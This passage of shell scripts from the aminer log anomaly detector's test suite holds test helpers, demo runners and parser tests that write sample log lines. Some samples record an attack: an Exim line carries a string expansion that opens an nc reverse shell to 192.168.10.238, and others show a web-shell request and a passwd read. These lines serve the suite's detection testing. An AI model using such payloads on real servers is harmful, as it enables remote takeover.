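        if ! [[ $dat -lt $time ]]; then
            expected="/tmp/output"
            found=false
            g=0
            while IFS= read -r line
            do
                if [ $g == $cntr ]; then
                    # Increase the counters, when a paragraph finished.
                    if [ "$line" == "" ]; then
                        j=0
                        i=$(($i+1))
                        cntr=$(($cntr + 1))
                        g=$(($g+1))
                        continue
                    fi
                    # The first line of a paragraph always starts with the count of paragraphs logged.
                    if [[ ($j == 0 && "$searched" == *": [$i] $line"*) ]]; then
                        found=true
                        cntr=$(($cntr + 1))
                        break
                    # All other lines also contain a counter for the lines in the paragraph
                    elif [[ "$searched" == *": [$i-$j] $line"* ]]; then
                        found=true
                        cntr=$(($cntr + 1))
                        break
                    fi
                fi
                g=$(($g+1))
            done < "$expected"
            if [ $found == true ]; then
                j=$(($j+1))
            fi
        fi
    done < "$input"
    echo "finished waiting.."
    # $NUMBER_OF_LOG_LINES must always be the number of paragraphs in /tmp/output minus one,
    # as there is no empty line before the first paragraph.
    if [ $i == $NUMBER_OF_LOG_LINES ]; then
        return 0
    fi
    return 1
}

# This function checks if the output of the Kafka Topic is as expected.
# Every entry of JSON_OUTPUT must appear in the consumed topic, in array order.
# Returns 0 when all entries were found, 1 otherwise (the missing entry and the remaining output are echoed).
function checkKafkaTopic(){
    out=$($KAFKA_VERSIONSTRING/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test_topic --from-beginning --timeout-ms 60000)
    for t in "${JSON_OUTPUT[@]}"
    do
        if [[ $out != *"$t"* ]]; then
            echo "searched: $t"
            echo
            echo "remaining output: $out"
            return 1
        fi
        # cut the output string to remove timestamps and datetimes.
        # "$t" is quoted so that [ ] * ? in the JSON are matched literally, exactly like in the test above.
        out=${out#*"$t"}
    done
    return 0
}

# This function checks if the output of the ZMQ Topic is as expected.
# Every entry of JSON_OUTPUT must appear in /tmp/zmq (written by zmq_subscriber.py), in array order.
# Returns 0 when all entries were found, 1 otherwise (the missing entry and the remaining output are echoed).
function checkZmqTopic(){
    out=$(cat /tmp/zmq)
    for t in "${JSON_OUTPUT[@]}"
    do
        if [[ $out != *"$t"* ]]; then
            echo "searched: $t"
            echo
            echo "remaining output: $out"
            return 1
        fi
        # cut the output string to remove timestamps and datetimes.
        # "$t" is quoted so that [ ] * ? in the JSON are matched literally, exactly like in the test above.
        out=${out#*"$t"}
    done
    return 0
}
logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/000077500000000000000000000000001500476301700257525ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/000077500000000000000000000000001500476301700266635ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/file1.log000066400000000000000000000000141500476301700303610ustar00rootroot00000000000000a1 b1 c1 z1 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/file2.log000066400000000000000000000000141500476301700303620ustar00rootroot00000000000000a2 b2 c2 z2 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/offline_mode.yml000066400000000000000000000010021500476301700311160ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' LogResourceList: - 'file:///tmp/file1.log' - 'file:///tmp/file2.log' Parser: - id: data type: AnyByteDataModelElement name: 'data' - id: model start: True type: FirstMatchModelElement name: 'model' args: - data Input: timestamp_paths: None EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/zmq_subscriber.py000066400000000000000000000011471500476301700267330ustar00rootroot00000000000000import zmq import zmq.asyncio import asyncio import time IPC_SOCK = "/tmp/aminer" ZMQ = "/tmp/zmq" topic = "test_topic" context = zmq.asyncio.Context() async def client(): socket = context.socket(zmq.SUB) socket.connect(f"ipc://{IPC_SOCK}") socket.subscribe(topic) with open(ZMQ, "w") as f: while True: value = await socket.recv_string() value = value.replace(topic, "") if value != "": f.write(value) f.flush() async def main(): await asyncio.gather(client()) if __name__ == "__main__": asyncio.run(main())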
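logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerDemo.sh000077500000000000000000000013371500476301700241070ustar00rootroot00000000000000
#!/bin/bash
# Runs demo/aminer/aminerDemo.sh with the configuration given as $1 (a .py or .yml file).
# Exit code: 2 for an unsupported configuration type, 1 when the demo's stderr contains a
# known error marker, otherwise the demo's own exit code.
ERR=/tmp/err.txt
# Stage the configuration under the fixed name the demo expects and hand it to the aminer user.
if [[ $1 == *.py ]]; then
    cp "$1" /tmp/demo-config.py
    sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null
elif [[ $1 == *.yml ]]; then
    cp "$1" /tmp/demo-config.yml
    sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null
else
    exit 2
fi
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminer/aminerDemo.sh
sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR
exit_code=$?
# Test grep's exit status directly; grep -q prints nothing, so wrapping it in backticks
# only ever worked by accident.
if grep -Fq "Traceback" $ERR || grep -Fq "{'Parser'" $ERR || grep -Fq "FATAL" $ERR || grep -Fq "Config-Error" $ERR; then
    exit_code=1
fi
cat $ERR
sudo rm /tmp/demo-config.py 2> /dev/null
sudo rm /tmp/demo-config.yml 2> /dev/null
sudo rm /tmp/syslog
sudo rm $ERR
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerEncodingDemo.sh000077500000000000000000000014121500476301700255520ustar00rootroot00000000000000
#!/bin/bash
# Same as runAminerDemo.sh, but forces Log.Encoding to latin-1 by appending the setting
# to the staged configuration before the demo is started.
# Exit code: 2 for an unsupported configuration type, 1 when a Traceback was printed,
# otherwise the demo's own exit code.
ERR=/tmp/err.txt
if [[ $1 == *.py ]]; then
    cp "$1" /tmp/demo-config.py
    echo "config_properties['Log.Encoding'] = 'latin-1'" >> /tmp/demo-config.py
    sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null
elif [[ $1 == *.yml ]]; then
    cp "$1" /tmp/demo-config.yml
    echo "Log.Encoding: 'latin-1'" >> /tmp/demo-config.yml
    sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null
else
    exit 2
fi
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminer/aminerDemo.sh
sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR
exit_code=$?
# NOTE(review): unlike runAminerDemo.sh only "Traceback" is treated as a failure here;
# FATAL / Config-Error markers on stderr are not checked — confirm whether that is intended.
if grep -Fq "Traceback" $ERR; then
    exit_code=1
fi
cat $ERR
sudo rm /tmp/demo-config.py 2> /dev/null
sudo rm /tmp/demo-config.yml 2> /dev/null
sudo rm $ERR
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerIntegrationTest.sh000077500000000000000000000011461500476301700263460ustar00rootroot00000000000000
#!/bin/bash
# Runs one integration test script (integration/$1). Every further argument is a file that is
# copied to /tmp for the duration of the test and removed afterwards.
# The host name is pinned to "localhost" because the integration helpers presumably compare
# aminer output against the content of /etc/hostname; it is not restored afterwards, so this
# script is meant for throw-away test hosts only.
echo localhost | sudo tee /etc/hostname > /dev/null
cd integration
script=$1
sudo chmod +x "$script"
cntr=0
for var in "$@"
do
    if [[ $cntr -gt 0 ]]; then
        cp "$var" /tmp/"$var"
    fi
    cntr=$(($cntr+1))
done
cp zmq_subscriber.py /tmp
sudo ./"$script"
exit_code=$?
# Remove the staged files again, whether or not the test succeeded.
cntr=0
for var in "$@"
do
    if [[ $cntr -gt 0 ]]; then
        sudo rm /tmp/"$var"
    fi
    cntr=$(($cntr+1))
done
test -e /var/mail/mail && sudo rm -f /var/mail/mail
cd ..
sudo rm /tmp/syslog
sudo rm /tmp/output
sudo rm /tmp/zmq_subscriber.py
test -e /tmp/out && sudo rm /tmp/out
test -e /tmp/auth.log && sudo rm /tmp/auth.log
exit $exit_code
logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerJsonInputDemo.sh000077500000000000000000000054561500476301700257670ustar00rootroot00000000000000
#!/bin/bash
# Runs the JSON input demo and compares its output (/tmp/out.txt) with the expected paragraphs.
cp demo/aminerJsonInputDemo/json-input-demo-config.yml /tmp/json-input-demo-config.yml
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminerJsonInputDemo/aminerJsonInputDemo.sh
sudo ./demo/aminerJsonInputDemo/aminerJsonInputDemo.sh > /tmp/out.txt
exit_code=$?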
OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model: {'menu': {'id': 'file', 'value': 'File', 'popup': {'menuitem': [{'value': 'New', 'onclick': 'CreateNewDoc()'}, {'value': 'Open', 'onclick': 'OpenDoc()'}, {'value': 'Close', 'onclick': 'CloseDoc()'}]}}} /model/menu/id/id: file /model/menu/value/value: File /model/menu/popup/menuitem/value/buttonNames: 0 /model/menu/popup/menuitem/onclick/buttonOnclick: 0 /model/menu/popup/menuitem/value/buttonNames: 1 /model/menu/popup/menuitem/onclick/buttonOnclick: 1 /model/menu/popup/menuitem/value/buttonNames: 2 /model/menu/popup/menuitem/onclick/buttonOnclick: 2 ['/model', '/model/menu/popup/menuitem/value/buttonNames', '/model/menu/popup/menuitem/onclick/buttonOnclick', '/model/menu/id/id', '/model/menu/value/value', '/model/menu/popup/menuitem/value/buttonNames/0', '/model/menu/popup/menuitem/onclick/buttonOnclick/0', '/model/menu/popup/menuitem/value/buttonNames/1', '/model/menu/popup/menuitem/onclick/buttonOnclick/1', '/model/menu/popup/menuitem/value/buttonNames/2', '/model/menu/popup/menuitem/onclick/buttonOnclick/2'] Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value combination(s) detected NewMatchPathValueComboDetector: "NewMatchPathValueCombo" (1 lines) (b'file', b'File') Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: 
"NewMatchPathValue" (1 lines) {'/model/menu/id/id': 'file'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: "NewMatchPathValue" (1 lines) {'/model/menu/value/value': 'File'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi sudo rm /tmp/json-input-demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm /tmp/out.txt exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerXmlInputDemo.sh000077500000000000000000000053361500476301700256150ustar00rootroot00000000000000#!/bin/bash cp demo/aminerXmlInputDemo/xml-input-demo-config.yml /tmp/xml-input-demo-config.yml sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminerXmlInputDemo/aminerXmlInputDemo.sh sudo ./demo/aminerXmlInputDemo/aminerXmlInputDemo.sh > /tmp/out.txt exit_code=$? OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model: {'messages': [{'note': {'+id': '501', 'to': 'Tove', 'from': 'Jani', 'heading': None, 'body': {'text1': "Don't forget me this weekend!", 'text2': "Don't forget me this weekend!"}}}, {'note': {'+id': '502', '+opt': 'text', 'to': 'Jani', 'from': 'Tove', 'heading': 'Re: ', 'body': {'text1': 'I will not', 'text2': 'I will not'}}}]} /model/messages/note/+id/id: 501 /model/messages/note/to/to: Tove /model/messages/note/from/from: Jani /model/messages/note/?heading: null /model/messages/note/body/text1/text1: Don't forget me this weekend! /model/messages/note/body/text2/text2: Don't forget me this weekend! 
/model/messages/note/+id/id: 502 /model/messages/note/_+opt/opt: text /model/messages/note/to/to: Jani /model/messages/note/from/from: Tove /model/messages/note/?heading/heading: Re: /model/messages/note/body/text1/text1: I will not /model/messages/note/body/text2/text2: I will not ['/model', '/model/messages/note/+id/id', '/model/messages/note/to/to', '/model/messages/note/from/from', '/model/messages/note/body/text1/text1', '/model/messages/note/body/text2/text2', '/model/messages/note/+id/id/0', '/model/messages/note/to/to/0', '/model/messages/note/from/from/0', '/model/messages/note/?heading', '/model/messages/note/body/text1/text1/0', '/model/messages/note/body/text2/text2/0', '/model/messages/note/+id/id/1', '/model/messages/note/_+opt/opt', '/model/messages/note/to/to/1', '/model/messages/note/from/from/1', '/model/messages/note/?heading/heading', '/model/messages/note/body/text1/text1/1', '/model/messages/note/body/text2/text2/1'] Original log line: Tove Jani Don't forget me this weekend! Don't forget me this weekend! Jani Tove Re: I will not I will not END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo echo "$OUTPUT" exit_code=1 fi sudo rm /tmp/xml-input-demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm /tmp/out.txt exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runBandit.sh000077500000000000000000000001571500476301700232710ustar00rootroot00000000000000#!/bin/bash bandit -r /usr/lib/logdata-anomaly-miner --ini /home/aminer/logdata-anomaly-miner/.bandit exit $? logdata-anomaly-miner-2.8.0/aecid-testsuite/runConfAvailableTest.sh000077500000000000000000002612321500476301700254210ustar00rootroot00000000000000#!/bin/bash . 
./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm /tmp/syslog 2> /dev/null exit_code=0 CONFIG_PATH=/tmp/config.yml OUT=/tmp/output.txt LOGFILE=/tmp/log.txt #PATH_AIT_LDS=../source/root/etc/aminer/conf-available/ait-lds/*.py PATH_AIT_LDS=/etc/aminer/conf-available/ait-lds/*.py #PATH_AIT_LDS2=../source/root/etc/aminer/conf-available/ait-lds2/*.py PATH_AIT_LDS2=/etc/aminer/conf-available/ait-lds2/*.py #PATH_GENERIC=../source/root/etc/aminer/conf-available/generic/*.py PATH_GENERIC=/etc/aminer/conf-available/generic/*.py cntr=0 files=() for filename in $PATH_AIT_LDS; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_AIT_LDS2; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_GENERIC; do files[$cntr]=$filename let cntr=cntr+1 done for filename in ${files[@]}; do cat > $CONFIG_PATH < $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; ApacheErrorParsingModel) echo '[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: Declaration of Horde_Form_Type_pgp::init($gpg, $temp_dir = NULL, $rows = NULL, $cols = NULL) should be compatible with Horde_Form_Type_longtext::init($rows = 8, $cols = 80, $helper = Array) in /usr/share/php/Horde/Form/Type.php on line 878, referer: http://mail.cup.com/nag/' > $LOGFILE echo "[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: system(): Cannot execute a blank command in words.php on line 12" > $LOGFILE echo "[Wed Mar 04 19:32:45.144442 2020] [:error] [pid 8738] [client 192.168.10.238:60488] PHP Notice: Undefined index: cmd in 
/var/www/mail.cup.com/static/evil.php on line 1" >> $LOGFILE echo "[Wed Mar 04 06:26:43.756548 2020] [:error] [pid 22069] [client 192.168.10.190:33604] PHP Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Horde_Form_Variable has a deprecated constructor in /usr/share/php/Horde/Form/Variable.php on line 24, referer: http://mail.cup.com/nag/" >> $LOGFILE ;; AuditdParsingModel) echo 'type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' > $LOGFILE echo 'type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo 'type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=LOGIN msg=audit(1582935421.373:947570): pid=25821 uid=0 old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=22 res=1' >> $LOGFILE echo "type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE echo 'type=CRED_REFR msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_START 
msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_ACCT msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_AUTH msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_DISP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_STOP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_END msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_CMD msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_ACQ msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE ;; EximParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 
19:17:34 no host name found for IP address 192.168.10.238" >> $LOGFILE echo "2020-03-04 19:21:48 VRFY failed for boyce@cup.com H=(x) [192.168.10.238]" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi <= trula@mail.cup.com U=www-data P=local S=8714 id=20200304192508.Horde.g3OQpszuommgdrQpHrx6wIc@mail.cup.com" >> $LOGFILE echo "2020-03-04 19:25:08 1j9Zdk-00029d-Bi => irwin R=local_user T=mail_spool" >> $LOGFILE echo '2020-03-04 19:36:19 1j9ZoZ-0002Jk-9W ** ${run{\x2fbin\x2fsh\t-c\t\x22nc\t-e\t\x2fbin\x2fsh\t192.168.10.238\t9963\x22}}@localhost: Too many "Received" headers - suspected mail loop' >> $LOGFILE echo "2020-03-04 19:36:57 1j9ZpB-0002KN-QF Completed" >> $LOGFILE echo "2020-03-04 20:04:25 1j9ZoZ-0002Jk-9W Message is frozen" >> $LOGFILE echo "2020-03-04 19:38:19 1j9ZoZ-0002Jk-9W Frozen (delivery error message)" >> $LOGFILE ;; SuricataEventParsingModel) echo '{"timestamp":"2020-02-29T00:00:12.734324+0000","flow_id":914989792375924,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.154","src_port":53985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":30266,"rrname":"190.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}}' > $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.000538+0000","flow_id":1357371404246463,"event_type":"flow","src_ip":"192.168.10.154","src_port":46289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:12.974271+0000","end":"2020-02-28T23:55:13.085657+0000","age":1,"state":"established","reason":"timeout","alerted":false}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.886252+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.190","src_port":39438,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:14.977952+0000","flow_id":149665274984610,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.154","src_port":80,"dest_ip":"192.168.10.190","dest_port":39438,"proto":"TCP","http":{"hostname":"mail.cup.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7326},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41080,"tx_id":1}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:00:18.000491+0000","event_type":"stats","stats":{"uptime":17705,"capture":{"kernel_packets":337720,"kernel_drops":0},"decoder":{"pkts":337749,"bytes":229373623,"invalid":3062,"ipv4":335528,"ipv6":10,"ethernet":337749,"raw":0,"null":0,"sll":0,"tcp":317611,"udp":14805,"sctp":0,"icmpv4":50,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":679,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7104256},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":7155,"ssn_memcap_drop":0,"pseudo":1082,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":7418,"synack":7307,"rst":3226,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":375,"memuse":819200,"reassembly_memuse":12281632},"detect":{"a
lert":58},"app_layer":{"flow":{"http":4883,"ftp":0,"smtp":0,"tls":1564,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":258,"dcerpc_udp":0,"dns_udp":6951,"failed_udp":119},"tx":{"http":13248,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":7185}},"flow_mgr":{"closed_pruned":7112,"new_pruned":21,"est_pruned":6999,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24462,"memcap_state":0,"memcap_global":0},"http":{"memuse":61601,"memcap":0}}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T00:01:53.976648+0000","flow_id":378741657290945,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.238","src_port":53156,"dest_ip":"192.168.10.154","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.cup.com","issuerdn":"CN=ChangeMe","fingerprint":"12:7a:88:ea:52:10:62:44:f0:c5:33:8a:28:2d:ad:12:a1:4e:7e:18","sni":"mail.cup.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:23","notafter":"2030-02-25T18:40:23"}}' >> $LOGFILE echo '{"timestamp":"2020-02-29T06:11:02.147044+0000","flow_id":415686269975930,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":50850,"dest_ip":"192.168.10.154","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.cup.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.cup.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}}' >> $LOGFILE ;; SuricataFastParsingModel) echo "02/29/2020-00:00:13.674931 [**] [1:2012887:3] ET POLICY Http 
Client Body contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.10.190:39438 -> 192.168.10.154:80" > $LOGFILE ;; SyslogParsingModel) echo "Feb 28 00:01:41 mail-0 dovecot: imap(kelsey): Logged out in=79 out=875" > $LOGFILE echo "Mar 1 06:25:38 mail dovecot: imap(lino): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:38]" >> $LOGFILE echo "Feb 28 00:01:44 mail-0 dovecot: imap(della): Error: file_dotlock_create(/var/mail/della) failed: Permission denied (euid=1013(della) egid=1013(della) missing +w perm: /var/mail, we're not in group 8(mail), dir owned by 0:8 mode=0775) (set mail_privileged_group=mail)" >> $LOGFILE echo "Mar 1 06:25:41 mail dovecot: imap(idella): Error: Failed to autocreate mailbox INBOX: Internal error occurred. Refer to server log for more information. [2020-03-01 06:25:41]" >> $LOGFILE echo "Mar 4 14:14:36 mail dovecot: imap-login: Disconnected (auth failed, 2 attempts in 12 secs): user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> $LOGFILE echo "Mar 4 18:43:05 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.185, lip=192.168.10.177, session=" >> $LOGFILE echo "Mar 4 13:51:48 mail dovecot: imap-login: Disconnected (disconnected before auth was ready, waited 0 secs): user=<>, rip=192.168.10.18, lip=192.168.10.21, session=<+KO9uAeg4sPAqAoS>" >> $LOGFILE echo "Mar 4 18:43:59 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=127.0.0.1, lip=127.0.0.1, mpid=11475, secured, session=<8ZitzQugnrh/AAAB>" >> $LOGFILE echo "Feb 28 11:39:45 mail-0 dovecot: imap-login: Error: anvil: Anvil queries timed out after 5 secs - aborting queries" >> $LOGFILE echo "Feb 28 09:15:59 mail-1 dovecot: imap-login: Warning: Auth process not responding, delayed sending initial response (greeting): user=<>, rip=127.0.0.1, lip=127.0.0.1, secured, session=" >> 
